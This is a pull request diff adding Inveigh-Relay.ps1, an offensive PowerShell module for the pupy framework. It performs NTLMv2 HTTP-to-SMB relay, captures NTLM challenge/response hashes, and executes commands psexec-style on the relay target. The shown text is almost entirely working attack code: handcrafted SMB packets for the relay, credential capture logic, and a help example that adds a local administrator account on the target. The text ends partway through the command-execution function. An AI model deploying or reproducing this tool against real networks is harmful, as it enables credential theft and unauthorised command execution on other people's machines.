### PR TITLE
Inveigh module and bug fix

### DIFF
--- a/pupy/external/Inveigh/Inveigh-Relay.ps1
+++ b/pupy/external/Inveigh/Inveigh-Relay.ps1
@@ -1,0 +1,2125 @@
+function Invoke-InveighRelay
+{
+<#
+.SYNOPSIS
+Invoke-InveighRelay performs NTLMv2 HTTP to SMB relay with psexec style command execution.
+
+.DESCRIPTION
+Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB relay with psexec style command execution.
+
+    HTTP/HTTPS to SMB NTLMv2 relay with granular control
+    NTLMv1/NTLMv2 challenge/response capture over HTTP/HTTPS
+    Granular control of console and file output
+    Can be executed as either a standalone function or through Invoke-Inveigh
+
+.PARAMETER HTTP
+Default = Enabled: (Y/N) Enable/Disable HTTP challenge/response capture.
+
+.PARAMETER HTTPS
+Default = Disabled: (Y/N) Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in
+the local store and attached to port 443. If the script does not exit gracefully, execute
+"netsh http delete sslcert ipport=0.0.0.0:443" and manually remove the certificate from "Local Computer\Personal"
+in the cert store.
+
+.PARAMETER HTTPSCertAppID
+Valid application GUID for use with the ceriticate.
+
+.PARAMETER HTTPSCertThumbprint
+Certificate thumbprint for use with a custom certificate. The certificate filename must be located in the current
+working directory and named Inveigh.pfx.
+
+.PARAMETER Challenge
+Default = Random: 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random
+challenge will be generated for each request. Note that during SMB relay attempts, the challenge will be
+pulled from the SMB relay target. 
+
+.PARAMETER MachineAccounts
+Default = Disabled: (Y/N) Enable/Disable showing NTLM challenge/response captures from machine accounts.
+
+.PARAMETER WPADAuth
+Default = NTLM: (Anonymous,NTLM) HTTP/HTTPS server authentication type for wpad.dat requests. Setting to
+Anonymous can prevent browser login prompts.
+
+.PARAMETER SMBRelayTarget
+IP address of system to target for SMB relay.
+
+.PARAMETER SMBRelayCommand
+Command to execute on SMB relay target. Use PowerShell character escapes where necessary.
+
+.PARAMETER SMBRelayUsernames
+Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
+domain\username format. 
+
+.PARAMETER SMBRelayAutoDisable
+Default = Enable: (Y/N) Enable/Disable automaticaly disabling SMB relay after a successful command execution on
+target.
+
+.PARAMETER SMBRelayNetworkTimeout
+Default = No Timeout: (Integer) Duration in seconds that Inveigh will wait for a reply from the SMB relay target
+after each packet is sent.
+
+.PARAMETER ConsoleOutput
+Default = Disabled: (Y/N) Enable/Disable real time console output. If using this option through a shell, test to
+ensure that it doesn't hang the shell.
+
+.PARAMETER FileOutput
+Default = Disabled: (Y/N) Enable/Disable real time file output.
+
+.PARAMETER StatusOutput
+Default = Enabled: (Y/N) Enable/Disable startup and shutdown messages.
+
+.PARAMETER OutputStreamOnly
+Default = Disabled: Enable/Disable forcing all output to the standard output stream. This can be helpful if
+running Inveigh Relay through a shell that does not return other output streams. Note that you will not see the
+various yellow warning messages if enabled.
+
+.PARAMETER OutputDir
+Default = Working Directory: Valid path to an output directory for log and capture files. FileOutput must also be
+enabled.
+
+.PARAMETER RunTime
+(Integer) Run time duration in minutes.
+
+.PARAMETER StartupChecks
+Default = Enabled: (Y/N) Enable/Disable checks for in use ports and running services on startup.
+
+.PARAMETER ShowHelp
+Default = Enabled: (Y/N) Enable/Disable the help messages at startup.
+
+.PARAMETER Tool
+Default = 0: (0,1,2) Enable/Disable features for better operation through external tools such as Meterpreter's
+PowerShell extension, Metasploit's Interactive PowerShell Sessions payloads and Empire.
+0 = None, 1 = Metasploit/Meterpreter, 2 = Empire 
+
+.EXAMPLE
+Invoke-Inveigh -HTTP N
+Invoke-InveighRelay -SMBRelayTarget 192.168.2.55 -SMBRelayCommand "net user Dave Summer2016 /add && net localgroup administrators Dave /add"
+Perform SMB relay with a command that will create a local administrator account on the SMB relay
+target.
+
+.LINK
+https://github.com/Kevin-Robertson/Inveigh
+#>
+
+# Parameter default values can be modified in this section:
+[CmdletBinding()]
+param
+( 
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTP = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$HTTPS = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ConsoleOutput = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$FileOutput = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StatusOutput = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$OutputStreamOnly = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$MachineAccounts = "N",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$ShowHelp = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$SMBRelayAutoDisable = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Y","N")][String]$StartupChecks = "Y",
+    [parameter(Mandatory=$false)][ValidateSet("Anonymous","NTLM")][String]$WPADAuth = "NTLM",
+    [parameter(Mandatory=$false)][ValidateSet("0","1","2")][String]$Tool = "0",
+    [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
+    [parameter(Mandatory=$true)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$SMBRelayTarget = "",
+    [parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+    [parameter(Mandatory=$false)][Array]$SMBRelayUsernames = "",
+    [parameter(Mandatory=$false)][Int]$SMBRelayNetworkTimeout = "",
+    [parameter(Mandatory=$false)][Int]$RunTime = "",
+    [parameter(Mandatory=$true)][String]$SMBRelayCommand = "",
+    [parameter(Mandatory=$false)][String]$HTTPSCertAppID = "00112233-4455-6677-8899-AABBCCDDEEFF",
+    [parameter(Mandatory=$false)][String]$HTTPSCertThumbprint = "98c1d54840c5c12ced710758b6ee56cc62fa1f0d",
+    [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter
+)
+
+if ($invalid_parameter)
+{
+    throw "$($invalid_parameter) is not a valid parameter."
+}
+
+if($inveigh.HTTP -or $inveigh.HTTPS)
+{
+    throw "You must stop stop other Inveigh HTTP/HTTPS listeners before running this module."
+}
+
+if(!$SMBRelayTarget)
+{
+    throw "You must specify an -SMBRelayTarget if enabling -SMBRelay"
+}
+
+if(!$SMBRelayCommand)
+{
+    throw "You must specify an -SMBRelayCommand if enabling -SMBRelay"
+}
+
+if(!$OutputDir)
+{ 
+    $output_directory = $PWD.Path
+}
+else
+{
+    $output_directory = $OutputDir
+}
+
+if(!$inveigh)
+{
+    $global:inveigh = [HashTable]::Synchronized(@{})
+    $inveigh.log = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList
+    $inveigh.cleartext_list = New-Object System.Collections.ArrayList
+    $inveigh.IP_capture_list = New-Object System.Collections.ArrayList
+    $inveigh.SMBRelay_failed_list = New-Object System.Collections.ArrayList
+    $inveigh.valid_host_list = New-Object System.Collections.ArrayList
+}
+
+if($inveigh.HTTP_listener.IsListening -and !$inveigh.running)
+{
+    $inveigh.HTTP_listener.Stop()
+    $inveigh.HTTP_listener.Close()
+}
+
+if(!$inveigh.running -or !$inveigh.unprivileged_running)
+{
+    $inveigh.console_queue = New-Object System.Collections.ArrayList
+    $inveigh.status_queue = New-Object System.Collections.ArrayList
+    $inveigh.log_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv1_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.NTLMv2_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.cleartext_file_queue = New-Object System.Collections.ArrayList
+    $inveigh.HTTP_challenge_queue = New-Object System.Collections.ArrayList
+    $inveigh.certificate_application_ID = $HTTPSCertAppID
+    $inveigh.certificate_thumbprint = $HTTPSCertThumbprint
+    $inveigh.console_output = $false
+    $inveigh.console_input = $true
+    $inveigh.file_output = $false
+    $inveigh.log_out_file = $output_directory + "\Inveigh-Log.txt"
+    $inveigh.NTLMv1_out_file = $output_directory + "\Inveigh-NTLMv1.txt"
+    $inveigh.NTLMv2_out_file = $output_directory + "\Inveigh-NTLMv2.txt"
+    $inveigh.cleartext_out_file = $output_directory + "\Inveigh-Cleartext.txt"
+}
+
+$inveigh.relay_running = $true
+$inveigh.SMB_relay_active_step = 0
+$inveigh.SMB_relay = $true
+
+if($StatusOutput -eq 'Y')
+{
+    $inveigh.status_output = $true
+}
+else
+{
+    $inveigh.status_output = $false
+}
+
+if($OutputStreamOnly -eq 'Y')
+{
+    $inveigh.output_stream_only = $true
+}
+else
+{
+    $inveigh.output_stream_only = $false
+}
+
+if($Tool -eq 1) # Metasploit Interactive PowerShell Payloads and Meterpreter's PowerShell Extension
+{
+    $inveigh.tool = 1
+    $inveigh.output_stream_only = $true
+    $inveigh.newline = ""
+    $ConsoleOutput = "N"
+}
+elseif($Tool -eq 2) # PowerShell Empire
+{
+    $inveigh.tool = 2
+    $inveigh.output_stream_only = $true
+    $inveigh.console_input = $false
+    $inveigh.newline = "`n"
+    $ConsoleOutput = "Y"
+    $ShowHelp = "N"
+}
+else
+{
+    $inveigh.tool = 0
+    $inveigh.newline = ""
+}
+
+# Write startup messages
+$inveigh.status_queue.Add("Inveigh Relay started at $(Get-Date -format 's')") > $null
+$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - Inveigh Relay started")]) > $null
+
+if($StartupChecks -eq 'Y')
+{
+    $firewall_status = netsh advfirewall show allprofiles state | Where-Object {$_ -match 'ON'}
+}
+
+if($firewall_status)
+{
+    $inveigh.status_queue.Add("Windows Firewall = Enabled")  > $null
+
+    $firewall_rules = New-Object -comObject HNetCfg.FwPolicy2
+    $firewall_powershell = $firewall_rules.rules | Where-Object {$_.Enabled -eq $true -and $_.Direction -eq 1} |Select-Object -Property Name | Select-String "Windows PowerShell}"
+
+    if($firewall_powershell)
+    {
+        $inveigh.status_queue.Add("Windows Firewall - PowerShell.exe = Allowed")  > $null
+    }
+}
+
+if($HTTP -eq 'Y')
+{
+
+    if($StartupChecks -eq 'Y')
+    {
+        $HTTP_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:":80 "
+    }
+
+    if($HTTP_port_check)
+    {
+        $inveigh.HTTP = $false
+        $inveigh.status_queue.Add("HTTP Capture/Relay Disabled Due To In Use Port 80")  > $null
+    }
+    else
+    {
+        $inveigh.HTTP = $true
+        $inveigh.status_queue.Add("HTTP Capture/Relay = Enabled")  > $null
+    }
+
+}
+else
+{
+    $inveigh.HTTP = $false
+    $inveigh.status_queue.Add("HTTP Capture/Relay = Disabled")  > $null
+}
+
+if($HTTPS -eq 'Y')
+{
+    
+    if($StartupChecks -eq 'Y')
+    {
+        $HTTPS_port_check = netstat -anp TCP | findstr LISTENING | findstr /C:":443 "
+    }
+
+    if($HTTPS_port_check)
+    {
+        $inveigh.HTTPS = $false
+        $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To In Use Port 443")  > $null
+    }
+    else
+    {
+
+        try
+        {
+            $inveigh.HTTPS = $true
+            $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
+            $certificate_store.Open('ReadWrite')
+            $certificate = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2
+            $certificate.Import($PWD.Path + "\Inveigh.pfx")
+            $certificate_store.Add($certificate) 
+            $certificate_store.Close()
+            $netsh_certhash = "certhash=" + $inveigh.certificate_thumbprint
+            $netsh_app_ID = "appid={" + $inveigh.certificate_application_ID + "}"
+            $netsh_arguments = @("http","add","sslcert","ipport=0.0.0.0:443",$netsh_certhash,$netsh_app_ID)
+            & "netsh" $netsh_arguments > $null
+            $inveigh.status_queue.Add("HTTPS Capture/Relay = Enabled")  > $null
+        }
+        catch
+        {
+            $certificate_store.Close()
+            $HTTPS="N"
+            $inveigh.HTTPS = $false
+            $inveigh.status_queue.Add("HTTPS Capture/Relay Disabled Due To Certificate Install Error")  > $null
+        }
+
+    }
+
+}
+else
+{
+    $inveigh.status_queue.Add("HTTPS Capture/Relay = Disabled")  > $null
+}
+
+if($inveigh.HTTP -or $inveigh.HTTPS)
+{
+
+    if($Challenge)
+    {
+        $inveigh.status_queue.Add("NTLM Challenge = $Challenge")  > $null
+    }
+
+    if($MachineAccounts -eq 'N')
+    {
+        $inveigh.status_queue.Add("Machine Account Capture = Disabled") > $null
+        $inveigh.machine_accounts = $false
+    }
+    else
+    {
+        $inveigh.machine_accounts = $true
+    }
+
+    $inveigh.status_queue.Add("WPAD Authentication = $WPADAuth") > $null
+
+}
+
+$inveigh.status_queue.Add("SMB Relay Target = $SMBRelayTarget") > $null
+
+if($SMBRelayUsernames)
+{
+
+    if($SMBRelayUsernames.Count -eq 1)
+    {
+        $inveigh.status_queue.Add("SMB Relay Username = " + ($SMBRelayUsernames -join ",")) > $null
+    }
+    else
+    {
+        $inveigh.status_queue.Add("SMB Relay Usernames = " + ($SMBRelayUsernames -join ",")) > $null
+    }
+
+}
+
+if($SMBRelayAutoDisable -eq 'Y')
+{
+    $inveigh.status_queue.Add("SMB Relay Auto Disable = Enabled") > $null
+}
+else
+{
+    $inveigh.status_queue.Add("SMB Relay Auto Disable = Disabled") > $null
+}
+
+if($SMBRelayNetworkTimeout)
+{
+    $inveigh.status_queue.Add("SMB Relay Network Timeout = $SMBRelayNetworkTimeout Seconds") > $null
+}
+
+if($ConsoleOutput -eq 'Y')
+{
+    $inveigh.status_queue.Add("Real Time Console Output = Enabled") > $null
+    $inveigh.console_output = $true
+}
+else
+{
+
+    if($inveigh.tool -eq 1)
+    {
+        $inveigh.status_queue.Add("Real Time Console Output Disabled Due To External Tool Selection") > $null
+    }
+    else
+    {
+        $inveigh.status_queue.Add("Real Time Console Output = Disabled") > $null
+    }
+
+}
+
+if($FileOutput -eq 'Y')
+{
+
+    if($inveigh.file_output)
+    {
+        $inveigh.file_output = $false      
+    }
+    else
+    {
+        $inveigh.file_output = $true
+    }
+
+    $inveigh.status_queue.Add("Real Time File Output = Enabled") > $null
+    $inveigh.status_queue.Add("Output Directory = $output_directory") > $null
+    $inveigh.file_output = $true
+
+}
+else
+{
+    $inveigh.status_queue.Add("Real Time File Output = Disabled") > $null
+}
+
+if($RunTime -eq 1)
+{
+    $inveigh.status_queue.Add("Run Time = $RunTime Minute") > $null
+}
+elseif($RunTime -gt 1)
+{
+    $inveigh.status_queue.Add("Run Time = $RunTime Minutes") > $null
+}
+
+if($ShowHelp -eq 'Y')
+{
+    $inveigh.status_queue.Add("Run Stop-Inveigh to stop Inveigh-Relay") > $null
+        
+    if($inveigh.console_output)
+    {
+        $inveigh.status_queue.Add("Press any key to stop real time console output") > $null
+    }
+
+}
+
+if($inveigh.status_output)
+{
+
+    while($inveigh.status_queue.Count -gt 0)
+    {
+
+        if($inveigh.output_stream_only)
+        {
+            Write-Output($inveigh.status_queue[0] + $inveigh.newline)
+            $inveigh.status_queue.RemoveAt(0)
+        }
+        else
+        {
+
+            switch -Wildcard ($inveigh.status_queue[0])
+            {
+
+                "* Disabled Due To *"
+                {
+                    Write-Warning($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+                
+                "Run Stop-Inveigh to stop Inveigh-Relay"
+                {
+                    Write-Warning($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+
+                "Windows Firewall = Enabled"
+                {
+                    Write-Warning($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+
+                default
+                {
+                    Write-Output($inveigh.status_queue[0])
+                    $inveigh.status_queue.RemoveAt(0)
+                }
+
+            }
+
+        }
+
+    }
+
+}
+
+$process_ID = [System.Diagnostics.Process]::GetCurrentProcess() | Select-Object -expand id
+$process_ID = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($process_ID))
+$process_ID = $process_ID -replace "-00-00",""
+[Byte[]]$inveigh.process_ID_bytes = $process_ID.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+
+# Begin ScriptBlocks
+
+# Shared Basic functions ScriptBlock
+$shared_basic_functions_scriptblock =
+{
+
+    function DataLength2
+    {
+        param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+        $string_length = [System.BitConverter]::ToUInt16($string_extract_data[$length_start..($length_start + 1)],0)
+        return $string_length
+    }
+
+    function DataLength4
+    {
+        param ([Int]$length_start,[Byte[]]$string_extract_data)
+
+        $string_length = [System.BitConverter]::ToUInt32($string_extract_data[$length_start..($length_start + 3)],0)
+        return $string_length
+    }
+
+    function DataToString
+    {
+        param ([Int]$string_start,[Int]$string_length,[Byte[]]$string_extract_data)
+
+        $string_data = [System.BitConverter]::ToString($string_extract_data[$string_start..($string_start + $string_length - 1)])
+        $string_data = $string_data -replace "-00",""
+        $string_data = $string_data.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $string_extract = New-Object System.String ($string_data,0,$string_data.Length)
+        return $string_extract
+    }
+
+}
+
+# SMB NTLM functions ScriptBlock - function for parsing NTLM challenge/response
+$SMB_NTLM_functions_scriptblock =
+{
+    function SMBNTLMChallenge
+    {
+        param ([Byte[]]$payload_bytes)
+
+        $payload = [System.BitConverter]::ToString($payload_bytes)
+        $payload = $payload -replace "-",""
+        $NTLM_index = $payload.IndexOf("4E544C4D53535000")
+
+        if($payload.SubString(($NTLM_index + 16),8) -eq "02000000")
+        {
+            $NTLM_challenge = $payload.SubString(($NTLM_index + 48),16)
+        }
+
+        return $NTLM_challenge
+    }
+
+}
+
+# SMB Relay Challenge ScriptBlock - gathers NTLM server challenge from relay target
+$SMB_relay_challenge_scriptblock =
+{
+    function SMBRelayChallenge
+    {
+        param ($SMB_relay_socket,$HTTP_request_bytes)
+
+        if ($SMB_relay_socket)
+        {
+            $SMB_relay_challenge_stream = $SMB_relay_socket.GetStream()
+        }
+        
+        $SMB_relay_challenge_bytes = New-Object System.Byte[] 1024
+        $i = 0
+        
+        :SMB_relay_challenge_loop while ($i -lt 2)
+        {
+        
+            switch ($i)
+            {
+
+                0
+                {
+                    $SMB_relay_challenge_send = 0x00,0x00,0x00,0x2f,0xff,0x53,0x4d,0x42,0x72,0x00,0x00,0x00,0x00,
+                                                0x18,0x01,0x48,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
+                                                0x00,0x00,0xff,0xff +
+                                                $inveigh.process_ID_bytes +
+                                                0x00,0x00,0x00,0x00,0x00,0x0c,0x00,0x02,0x4e,0x54,0x20,0x4c,0x4d,
+                                                0x20,0x30,0x2e,0x31,0x32,0x00
+                }
+                
+                1
+                { 
+                    $SMB_length_1 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 32)
+                    $SMB_length_2 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 22)
+                    $SMB_length_3 = '0x{0:X2}' -f ($HTTP_request_bytes.Length + 2)
+                    $SMB_NTLMSSP_length = '0x{0:X2}' -f ($HTTP_request_bytes.Length)
+                    $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 34))
+                    $SMB_blob_length = $SMB_blob_length -replace "-00-00",""
+                    $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                    $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 45))
+                    $SMB_byte_count = $SMB_byte_count -replace "-00-00",""
+                    $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                    $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 104))
+                    $SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
+                    $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+                    [Array]::Reverse($SMB_netbios_length)
+                    
+                    $SMB_relay_challenge_send = 0x00,0x00 +
+                                                $SMB_netbios_length +
+                                                0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,
+                                                0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
+                                                $inveigh.process_ID_bytes +
+                                                0x00,0x00,0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,
+                                                0x01,0x00,0x00,0x00,0x00,0x00 +
+                                                $SMB_blob_length +
+                                                0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
+                                                $SMB_byte_count +
+                                                0x60 +
+                                                $SMB_length_1 +
+                                                0x06,0x06,0x2b,0x06,0x01,0x05,0x05,0x02,0xa0 +
+                                                $SMB_length_2 +
+                                                0x30,0x3c,0xa0,0x0e,0x30,0x0c,0x06,0x0a,0x2b,0x06,0x01,0x04,0x01,
+                                                0x82,0x37,0x02,0x02,0x0a,0xa2 +
+                                                $SMB_length_3 +
+                                                0x04 +
+                                                $SMB_NTLMSSP_length +
+                                                $HTTP_request_bytes +
+                                                0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00
+                }
+            
+            }
+
+            $SMB_relay_challenge_stream.Write($SMB_relay_challenge_send,0,$SMB_relay_challenge_send.Length)
+            $SMB_relay_challenge_stream.Flush()
+            
+            if($SMBRelayNetworkTimeout)
+            {
+                $SMB_relay_challenge_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout
+                $SMB_relay_challenge_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
+                
+                while(!$SMB_relay_challenge_stream.DataAvailable)
+                {
+
+                    if($SMB_relay_challenge_stopwatch.Elapsed -ge $SMB_relay_challenge_timeout)
+                    {
+                        $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
+                        $inveigh.SMB_relay_active_step = 0
+                        $SMB_relay_socket.Close()
+                        break SMB_relay_challenge_loop
+                    }
+                
+                }
+            
+            }
+    
+            $SMB_relay_challenge_stream.Read($SMB_relay_challenge_bytes,0,$SMB_relay_challenge_bytes.Length)
+            $i++
+        }
+        
+        return $SMB_relay_challenge_bytes
+    }
+
+}
+
+# SMB Relay Response ScriptBlock - sends NTLM reponse to relay target
+$SMB_relay_response_scriptblock =
+{
+    function SMBRelayResponse
+    {
+        param ($SMB_relay_socket,$HTTP_request_bytes,$SMB_user_ID)
+    
+        $SMB_relay_response_bytes = New-Object System.Byte[] 1024
+
+        if ($SMB_relay_socket)
+        {
+            $SMB_relay_response_stream = $SMB_relay_socket.GetStream()
+        }
+
+        $SMB_length_1 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 12))
+        $SMB_length_1 = $SMB_length_1 -replace "-00-00",""
+        $SMB_length_1 = $SMB_length_1.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_length_2 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 8))
+        $SMB_length_2 = $SMB_length_2 -replace "-00-00",""
+        $SMB_length_2 = $SMB_length_2.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_length_3 = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 4))
+        $SMB_length_3 = $SMB_length_3 -replace "-00-00",""
+        $SMB_length_3 = $SMB_length_3.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_NTLMSSP_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length))
+        $SMB_NTLMSSP_length = $SMB_NTLMSSP_length -replace "-00-00",""
+        $SMB_NTLMSSP_length = $SMB_NTLMSSP_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_blob_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 16))
+        $SMB_blob_length = $SMB_blob_length -replace "-00-00",""
+        $SMB_blob_length = $SMB_blob_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_byte_count = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 27))
+        $SMB_byte_count = $SMB_byte_count -replace "-00-00",""
+        $SMB_byte_count = $SMB_byte_count.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_netbios_length = [System.BitConverter]::ToString([System.BitConverter]::GetBytes($HTTP_request_bytes.Length + 86))
+        $SMB_netbios_length = $SMB_netbios_length -replace "-00-00",""
+        $SMB_netbios_length = $SMB_netbios_length.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        [Array]::Reverse($SMB_length_1)
+        [Array]::Reverse($SMB_length_2)
+        [Array]::Reverse($SMB_length_3)
+        [Array]::Reverse($SMB_NTLMSSP_length)
+        [Array]::Reverse($SMB_netbios_length)
+        $j = 0
+        
+        :SMB_relay_response_loop while ($j -lt 1)
+        {
+            $SMB_relay_response_send = 0x00,0x00 +
+                                        $SMB_netbios_length +
+                                        0xff,0x53,0x4d,0x42,0x73,0x00,0x00,0x00,0x00,0x18,0x01,0x48,0x00,0x00,0x00,
+                                        0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff +
+                                        $inveigh.process_ID_bytes +
+                                        $SMB_user_ID +
+                                        0x00,0x00,0x0c,0xff,0x00,0x00,0x00,0xff,0xff,0x02,0x00,0x01,0x00,0x00,0x00,
+                                        0x00,0x00 +
+                                        $SMB_blob_length +
+                                        0x00,0x00,0x00,0x00,0x44,0x00,0x00,0x80 +
+                                        $SMB_byte_count +
+                                        0xa1,0x82 +
+                                        $SMB_length_1 +
+                                        0x30,0x82 +
+                                        $SMB_length_2 +
+                                        0xa2,0x82 +
+                                        $SMB_length_3 +
+                                        0x04,0x82 +
+                                        $SMB_NTLMSSP_length +
+                                        $HTTP_request_bytes +
+                                        0x55,0x6e,0x69,0x78,0x00,0x53,0x61,0x6d,0x62,0x61,0x00
+
+            $SMB_relay_response_stream.Write($SMB_relay_response_send,0,$SMB_relay_response_send.Length)
+        	$SMB_relay_response_stream.Flush()
+            
+            if($SMBRelayNetworkTimeout)
+            {
+                $SMB_relay_response_timeout = New-TimeSpan -Seconds $SMBRelayNetworkTimeout
+                $SMB_relay_response_stopwatch = [Sustem.Diagnostics.Stopwatch]::StartNew()
+                    
+                while(!$SMB_relay_response_stream.DataAvailable)
+                {
+
+                    if($SMB_relay_response_stopwatch.Elapsed -ge $SMB_relay_response_timeout)
+                    {
+                        $inveigh.console_queue.Add("SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")
+                        $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target didn't respond within $SMBRelayNetworkTimeout seconds")])
+                        $inveigh.SMB_relay_active_step = 0
+                        $SMB_relay_socket.Close()
+                        break :SMB_relay_response_loop
+                    }
+
+                }
+
+            }
+
+            $SMB_relay_response_stream.Read($SMB_relay_response_bytes,0,$SMB_relay_response_bytes.Length)
+            $inveigh.SMB_relay_active_step = 2
+            $j++
+        }
+
+        return $SMB_relay_response_bytes
+    }
+
+}
+
+# SMB Relay Execute ScriptBlock - executes command within authenticated SMB session
+$SMB_relay_execute_scriptblock =
+{
+    function SMBRelayExecute
+    {
+        param ($SMB_relay_socket,$SMB_user_ID)
+    
+        if ($SMB_relay_socket)
+        {
+            $SMB_relay_execute_stream = $SMB_relay_socket.GetStream()
+        }
+
+        $SMB_relay_failed = $false
+        $SMB_relay_execute_bytes = New-Object System.Byte[] 1024
+        $SMB_service_random = [String]::Join("00-",(1..20 | ForEach-Object{"{0:X2}-" -f (Get-Random -Minimum 65 -Maximum 90)}))
+        $SMB_service = $SMB_service_random -replace "-00",""
+        $SMB_service = $SMB_service.Substring(0,$SMB_service.Length - 1)
+        $SMB_service = $SMB_service.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_service = New-Object System.String ($SMB_service,0,$SMB_service.Length)
+        $SMB_service_random += '00-00-00'
+        [Byte[]] $SMB_service_bytes = $SMB_service_random.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_referent_ID_bytes = [String](1..4 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
+        $SMB_referent_ID_bytes = $SMB_referent_ID_bytes.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMBRelayCommand = "%COMSPEC% /C `"" + $SMBRelayCommand + "`""
+        [System.Text.Encoding]::UTF8.GetBytes($SMBRelayCommand) | ForEach-Object{$SMB_relay_command += "{0:X2}-00-" -f $_}
+
+        if([Bool]($SMBRelayCommand.Length % 2))
+        {
+            $SMB_relay_command += '00-00'
+        }
+        else
+        {
+            $SMB_relay_command += '00-00-00-00'
+        }    
+        
+        [Byte[]] $SMB_relay_command_bytes = $SMB_relay_command.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+        $SMB_service_data_length_bytes = [System.BitConverter]::GetBytes($SMB_relay_command_bytes.Length + $SMB_service_bytes.Length + 237)
+        $SMB_service_data_length_bytes = $SMB_service_data_length_bytes[2..0]
